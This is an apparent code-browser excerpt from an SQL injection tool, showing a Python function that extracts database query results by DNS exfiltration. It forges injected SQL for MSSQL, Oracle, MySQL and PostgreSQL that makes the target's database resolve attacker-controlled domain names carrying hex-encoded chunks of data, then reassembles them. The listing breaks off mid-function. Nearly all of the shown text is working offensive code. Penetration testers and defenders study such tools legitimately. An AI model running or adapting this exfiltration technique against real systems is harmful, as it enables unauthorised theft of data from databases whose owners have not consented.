Retrieve the output of a SQL query taking advantage of the DNS resolution mechanism by making request back to attacker's machine.
(payload, expression)
| 35 | from lib.utils.safe2bin import safecharencode |
| 36 | |
| 37 | def dnsUse(payload, expression): |
| 38 | """ |
| 39 | Retrieve the output of a SQL query taking advantage of the DNS |
| 40 | resolution mechanism by making request back to attacker's machine. |
| 41 | """ |
| 42 | |
| 43 | start = time.time() |
| 44 | |
| 45 | retVal = None |
| 46 | count = 0 |
| 47 | offset = 1 |
| 48 | |
| 49 | if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL): |
| 50 | output = hashDBRetrieve(expression, checkConf=True) |
| 51 | |
| 52 | if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None: |
| 53 | output = None |
| 54 | |
| 55 | if output is None: |
| 56 | kb.dnsMode = True |
| 57 | |
| 58 | while True: |
| 59 | count += 1 |
| 60 | prefix, suffix = ("%s" % randomStr(length=3, alphabet=DNS_BOUNDARIES_ALPHABET) for _ in xrange(2)) |
| 61 | chunk_length = MAX_DNS_LABEL // 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL // 4 - 2 |
| 62 | _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression) |
| 63 | nulledCastedField = agent.nullAndCastField(fieldToCastStr) |
| 64 | extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(fieldToCastStr), expression).group(0) |
| 65 | if extendedField != fieldToCastStr: # e.g. MIN(surname) |
| 66 | nulledCastedField = extendedField.replace(fieldToCastStr, nulledCastedField) |
| 67 | fieldToCastStr = extendedField |
| 68 | nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length) |
| 69 | nulledCastedField = agent.hexConvertField(nulledCastedField) |
| 70 | expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1) |
| 71 | |
| 72 | expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsDomain) |
| 73 | expressionUnescaped = unescaper.escape(expressionRequest) |
| 74 | |
| 75 | if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL): |
| 76 | query = agent.prefixQuery("; %s" % expressionUnescaped) |
| 77 | query = "%s%s" % (query, queries[Backend.getIdentifiedDbms()].comment.query) |
| 78 | forgedPayload = agent.payload(newValue=query) |
| 79 | else: |
| 80 | forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3))) |
| 81 | |
| 82 | Request.queryPage(forgedPayload, content=False, noteResponseTime=False, raise404=False) |
| 83 | |
| 84 | _ = conf.dnsServer.pop(prefix, suffix) |
| 85 | |
| 86 | if _: |
| 87 | _ = extractRegexResult(r"%s\.(?P<result>.+)\.%s" % (prefix, suffix), _, re.I) |
| 88 | _ = decodeDbmsHexValue(_) |
| 89 | output = (output or "") + _ |
| 90 | offset += len(_) |
| 91 | |
| 92 | if len(_) < chunk_length: |
| 93 | break |
| 94 | else: |
searching dependent graphs…